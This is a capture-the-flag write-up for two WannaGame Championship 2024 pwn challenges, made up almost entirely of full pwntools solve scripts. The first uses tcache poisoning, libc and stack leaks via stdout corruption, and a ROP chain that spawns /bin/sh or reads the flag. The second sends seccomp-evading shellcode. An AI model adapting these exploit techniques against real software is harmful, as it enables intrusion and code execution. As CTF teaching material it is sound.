[PWN] WannaGame Championship 2024

![image](https://hackmd.io/_uploads/H1o4Vk34yg.png) # pwn/LL ![image](https://hackmd.io/_uploads/BJOeH12E1e.png) ``` python3 solve.py [LOCAL | REMOTE] [EXECVE | ORW] ``` ```python= #!/usr/bin/env python3 from pwn import * exe = ELF("./ll_patched") libc = ELF("./libc.so.6") ld = ELF("./ld-linux-x86-64.so.2") context.binary = exe def conn(): if args.LOCAL: r = process([exe.path]) else: r = remote("154.26.136.227", 40266) return r def add_num_array(ID, count, array): r.sendlineafter(b"Your choice: ", b"1") r.sendlineafter(b"ID: ", str(ID).encode()) r.sendlineafter(b"How many numbers do you want to input? ", str(count).encode()) for i in range(count): r.sendline(str(array[i]).encode()) def delete_num_array(ID): r.sendlineafter(b"Your choice: ", b"2") r.sendlineafter(b"ID: ", str(ID).encode()) def view_num_array(ID): r.sendlineafter(b"Your choice: ", b"3") r.sendlineafter(b"ID: ", str(ID).encode()) def edit_num_array(ID, new_array): r.sendlineafter(b"Your choice: ", b"4") r.sendlineafter(b"ID: ", str(ID).encode()) for num in new_array: r.sendline(str(num).encode()) def add_name_array(index, size, name): r.sendlineafter(b"Your choice: ", b"5") r.sendlineafter(b"Index: ", str(index).encode()) r.sendlineafter(b"Size: ", str(size-0x10).encode()) r.send(name) def delete_name_array(index): r.sendlineafter(b"Your choice: ", b"6") r.sendlineafter(b"Index: ", str(index).encode()) def main(): main_arena_offset = 0x203ac0 print("[*] main_arena offset: ", hex(main_arena_offset)) add_num_array(1, 4, [0, 0x621, 0, 0]) # ID = 1 add_num_array(2, 2, [222, 222]) # ID = 2 add_num_array(3, 2, [333, 333]) # ID = 3 # head -> 1 -> 2 -> 3 -> NULL delete_num_array(2) # head -> 1 -> 3 -> NULL # 2 -> 3 -> NULL add_num_array(2, 2, [222, 222]) # ID = 2 delete_num_array(3) # head -> 1 -> 2 -> 3 -> 2 -> 3.... # tcache[size = 0x230] -> 3 # Leak heap view_num_array(3) r.recvuntil(b"Number at index 0 is: ") heap = int(r.recv(11), 16) << 12 r.recvuntil(b"Number at index 1 is: ") key_check = int(r.recvline()[:-1], 16) print("[*] heap: ", hex(heap)) print("[*] key check: ", hex(key_check)) num_1_addr = heap + 0x4d0 payload = b"\x00"*0x1b0 + p64(0) + p64(0x61) payload += p64(0) * 6 + p32(3) + p32(2) # ID and count payload += p64(num_1_addr + 0x10) # next pointer payload += p64(0) * 2 add_name_array(0, 0x228, payload) # index 0 #head -> 1 -> 2 -> 3 -> 0 (FAKE) -> NULL delete_num_array(0) #head -> 1 -> 2 -> 3 -> NULL # Leak libc view_num_array(1) r.recvuntil(b"Number at index 2 is: ") libc.address = int(r.recv(14), 16) - 0x203b20 # unsorted bin offset print("[*] libc: ", hex(libc.address)) print("[*] main_arena: ", hex(libc.address + main_arena_offset)) #print("heap set-arena ", hex(libc.address + main_arena_offset)) # good luck pwning :) add_name_array(1, 0x68, b"index_1") add_name_array(2, 0x68, b"index_2") delete_name_array(2) delete_name_array(1) _IO_2_1_stdout_ = libc.sym['_IO_2_1_stdout_'] environ = libc.sym['environ'] edit_num_array(1, [0, 0x71, ((num_1_addr+0x10) >> 12) ^ (_IO_2_1_stdout_-0x10), key_check]) add_name_array(1, 0x68, b"index_1") payload = p64(0xfbad1800) + p64(0)*3 payload += p64(environ) # write_base payload += p64(environ+8) payload += p64(environ+8)*2 payload += p64(environ+8+1) add_name_array(2, 0x68, payload) stack_leak = u64(r.recvuntil(b"Add name successfully", drop=True)) rbp = stack_leak - 0x138 print("[*] rbp: ", hex(rbp)) add_num_array(99, 2, [0xdead, 0xbeef]) delete_num_array(99) delete_name_array(0) edit_num_array(3, [((heap+0x930) >> 12 ) ^ rbp, key_check]) add_name_array(0, 0x228, b"index_0") ### GADGETS pop_rax_ret = libc.address + 0x00000000000dd237 pop_rdi_ret = libc.address + 0x000000000010f75b pop_rsi_ret = libc.address + 0x0000000000110a4d #0x00000000000ab891: pop rdx; or byte ptr [rcx - 0xa], al; ret; pop_rdx = libc.address + 0x00000000000ab891 pop_rcx_ret = libc.address + 0x00000000000a876e syscall_ret = libc.address + 0x0000000000098fa6 flag_address = rbp+0xc0 binsh = next(libc.search(b'/bin/sh')) system = libc.sym['system'] ### num_win = [0] ### ORW if args.ORW: num_win.append(pop_rax_ret) num_win.append(2) num_win.append(pop_rdi_ret) num_win.append(flag_address) num_win.append(pop_rsi_ret) num_win.append(0) num_win.append(syscall_ret) num_win.append(pop_rcx_ret) num_win.append(rbp-0x200) num_win.append(pop_rdx) num_win.append(0x100) num_win.append(pop_rax_ret) num_win.append(0) num_win.append(pop_rdi_ret) num_win.append(4) num_win.append(pop_rsi_ret) num_win.append(flag_address) num_win.append(syscall_ret) num_win.append(pop_rax_ret) num_win.append(1) num_win.append(pop_rdi_ret) num_win.append(1) num_win.append(syscall_ret) num_win.append(u64(b"./flag".ljust(8, b"\x00"))) ### elif args.EXECVE: ### sys execve num_win.append(pop_rsi_ret) num_win.append(0) num_win.append(pop_rdi_ret) num_win.append(binsh) num_win.append(pop_rax_ret) num_win.append(59) num_win.append(syscall_ret) ### add_num_array(0x1337, len(num_win), num_win) #input() r.sendlineafter(b"Your choice: ", b"7") r.interactive() if __name__ == "__main__": global r r = conn() main() ``` # pwn/Profcom ![image](https://hackmd.io/_uploads/BJkQrynEJg.png) ``` python3 solve.py ``` ```python= #!/usr/bin/env python3 from pwn import * exe = ELF("./pro_patched") libc = ELF("./libc.so.6") ld = ELF("./ld-linux-x86-64.so.2") context.binary = exe ''' block: read, readv, preadv -> use pread64 block: open -> use openat block: write, pwritev -> use writev 0: 64 48 8b 1c 25 00 03 mov rbx,QWORD PTR fs:0x300 7: 00 00 9: 83 ef 64 sub edi,0x64 c: 48 8b b3 d8 fe ff ff mov rsi,QWORD PTR [rbx-0x128] 13: 48 81 ee 4d af 03 00 sub rsi,0x3af4d 1a: b0 ff mov al,0xff 1c: ff c0 inc eax 1e: ff c0 inc eax 20: 0f 05 syscall 22: 89 c7 mov edi,eax 24: 48 8d b3 00 fc ff ff lea rsi,[rbx-0x400] 2b: b2 ff mov dl,0xff 2d: 30 c0 xor al,al 2f: 04 11 add al,0x11 31: 0f 05 syscall 33: 48 89 33 mov QWORD PTR [rbx],rsi 36: be 00 01 00 00 mov esi,0x100 3b: 48 89 73 08 mov QWORD PTR [rbx+0x8],rsi 3f: 8b 7b b0 mov edi,DWORD PTR [rbx-0x50] 42: 48 89 de mov rsi,rbx 45: 48 31 d2 xor rdx,rdx 48: ff c2 inc edx 4a: b0 14 mov al,0x14 4c: 0f 05 syscall ''' def conn(): r = remote("154.26.136.227", 31879) return r def main(): r = conn() shellcode1 = b"\x64\x48\x8B\x1C\x25\x00\x03\x00\x00\x83\xEF\x64\x48\x8B\xB3\xD8\xFE\xFF\xFF\x48\x81\xEE\x4D\xAF\x03\x00\xB0\xFF\xFF\xC0\xFF\xC0\x0F\x05\x89\xC7\x48\x8D\xB3\x00\xFC\xFF\xFF\xB2\xFF\x30\xC0\x04\x11\x0F\x05\x48\x89\x33\xBE\x00\x01\x00\x00\x48\x89\x73\x08\x8B\x7B\xB0\x48\x89\xDE\x48\x31\xD2\xFF\xC2\xB0\x14\x0F\x05" shellcode1 = shellcode1.ljust(0x68, b"\x00") shellcode1 += b"./flag\x00" r.sendlineafter(b"Shellcode: ", shellcode1) a = r.recvuntil(b"}", timeout=2) print(b"[*] flag: " + a) r.interactive() if __name__ == "__main__": main() ```